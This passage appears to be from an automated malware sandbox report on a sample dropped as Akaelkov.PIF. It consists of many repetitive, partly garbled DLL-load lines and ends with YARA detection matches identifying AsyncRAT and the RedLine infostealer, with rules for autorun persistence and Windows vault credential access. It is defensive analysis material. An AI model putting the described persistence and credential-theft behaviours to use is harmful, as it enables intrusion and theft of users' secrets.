              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??????s.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ????.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ???.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ???.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ???.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ????.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ?????.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ???.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??????s.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection loaded: ??.dllJump to behavior
              Source: PCMNil7wkU.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 9.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 9.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 4.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 7.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 9.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
